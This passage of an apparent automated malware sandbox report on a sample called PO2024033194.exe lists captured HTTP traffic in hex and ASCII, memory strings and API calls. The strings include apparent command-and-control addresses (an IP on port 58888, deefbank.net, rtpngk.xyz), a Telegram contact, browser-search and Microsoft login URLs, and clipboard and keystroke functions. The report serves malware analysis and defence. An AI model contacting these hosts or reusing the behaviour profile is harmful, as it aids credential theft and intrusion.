72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:43:50 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7679f-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:43:53 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7679f-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:43:55 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7679f-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:43:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7679f-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:45:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:45:03 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://156.226.108.98:58888/
            Source: drBzjAnGBElC.exe, 00000003.00000002.4633344393.000000000822E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.deefbank.net
            Source: drBzjAnGBElC.exe, 00000003.00000002.4633344393.000000000822E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.deefbank.net/1y6y/
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: replace.exe, 00000004.00000003.2461311982.00000000082C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand=
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://t.me/AG09999
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007912000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005C22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULp
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_l
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&u
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_auto
            Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000072CA000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000055DA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
